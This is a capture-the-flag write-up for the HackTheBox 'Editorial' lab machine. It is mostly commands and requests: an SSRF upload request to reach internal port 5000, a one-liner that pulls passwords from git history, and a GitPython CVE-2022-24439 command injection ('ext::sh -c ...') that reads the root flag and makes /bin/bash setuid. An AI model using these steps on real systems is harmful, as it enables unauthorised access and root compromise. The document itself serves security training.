HackTheBox Editorial Writeup

Explore the fundamentals of cybersecurity in the Editorial Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.

Add Hosts#

Edit the /etc/hosts file and add the following entries:

10.10.11.20 editorial.htb

Script to add hosts automatically#

ip="10.10.11.20"
domain="editorial.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV editorial.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 21:06 CEST
Nmap scan report for tiempoarriba.htb (10.10.11.20)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploiting Port 5000 on `editorial.htb`#

First, intercept the request to upload a file using Burp Suite by navigating to http://editorial.htb/upload.

Brute Force Port 5000#

Port 5000 was identified using Burp Suite’s repeater. By sending crafted requests, you can attempt to brute force internal endpoints on port 5000. In the request, use http://127.0.0.1:5000/ as the bookurl. You can then inspect the image preview to download any available files.

Here’s an example request for the brute force:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------345673946433514815222539054036
Content-Length: 365
Origin: http://editorial.htb
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://editorial.htb/upload
Priority: u=0

-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/
-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------345673946433514815222539054036--

Fetch and Inspect Files#

Once you successfully brute force and discover an endpoint, you can fetch the exposed file by following the steps below:

The endpoint will be shown in the response to the POST /upload-cover request.

echo -n "Endpoint -->"
read endpoint
wget http://editorial.htb/static/uploads/$endpoint
cat $endpoint | jq
rm -rf $endpoint

This will retrieve the file, which could reveal valuable information like additional API endpoints.

Exploit Another Endpoint#

Target endpoint http://127.0.0.1:5000/api/latest/metadata/messages/authors by following the same steps to extract sensitive information.

SSH Access#

Once you gather enough information, SSH into the editorial.htb server:

ssh dev@editorial.htb
cat user.txt

Git Inspection#

Navigate to the apps directory to inspect the git history and reset to a previous commit:

cd apps
git log
git reset --hard HEAD^  # Go back 1 commit
git log --all -p        # Show all commit diffs

Extract Credentials#

To automatically extract credentials from git commit diffs, use the following command:

echo -e "$(git log --all -p | grep -Eo "Username:.*|Password:.*" | awk 'NR==1{print; exit}')"

Privilege Escalation#

Switch to the prod user and check available sudo commands:

su prod
sudo -l

You will find:

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Exploiting GitPython CVE#

Using CVE-2022–24439, exploit the command to escalate privileges and read the root flag:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
cat /tmp/root

Getting an actual root shell

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% 4755% /bin/bash'
/bin/bash -p